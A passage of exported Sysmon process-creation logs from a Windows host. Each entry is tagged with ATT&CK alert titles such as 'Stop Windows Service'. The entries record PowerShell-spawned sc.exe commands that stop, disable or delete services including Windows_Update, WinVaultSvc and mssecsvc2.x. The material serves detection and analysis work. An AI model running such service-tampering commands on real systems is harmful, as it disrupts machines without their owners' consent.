10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinVaultSvc Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.916"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010154f2600}"",""processId"":""5532"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinVaultSvc Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.291",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.887 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010c04b2600} +ProcessId: 7304 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.890564100Z"",""eventRecordID"":""2943"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.887\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010c04b2600}\r\nProcessId: 7304\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.887"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010c04b2600}"",""processId"":""7304"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.241",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.841 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00109c472600} +ProcessId: 3224 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Windows Managers"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.845035500Z"",""eventRecordID"":""2940"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.841\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00109c472600}\r\nProcessId: 3224\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:56.841"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-00109c472600}"",""processId"":""3224"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Windows Managers\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.183",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.811 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010e7452600} +ProcessId: 7940 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Windows_Update +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Windows_Update",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.816267000Z"",""eventRecordID"":""2938"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.811\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010e7452600}\r\nProcessId: 7940\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Windows_Update\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.811"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010e7452600}"",""processId"":""7940"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Windows_Update"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:25.158",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.796 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00100c452600} +ProcessId: 7704 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Windows_Update 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.799420300Z"",""eventRecordID"":""2937"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.796\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00100c452600}\r\nProcessId: 7704\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.796"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-00100c452600}"",""processId"":""7704"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Windows_Update"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.748",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.747 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00101b422600} +ProcessId: 1144 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.0 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.750441900Z"",""eventRecordID"":""2934"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.747\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00101b422600}\r\nProcessId: 1144\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.747"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-00101b422600}"",""processId"":""1144"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.0"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.657",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:50:56.677 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00102b3f2600} +ProcessId: 5692 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.681957600Z"",""eventRecordID"":""2931"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.677\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-00102b3f2600}\r\nProcessId: 5692\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
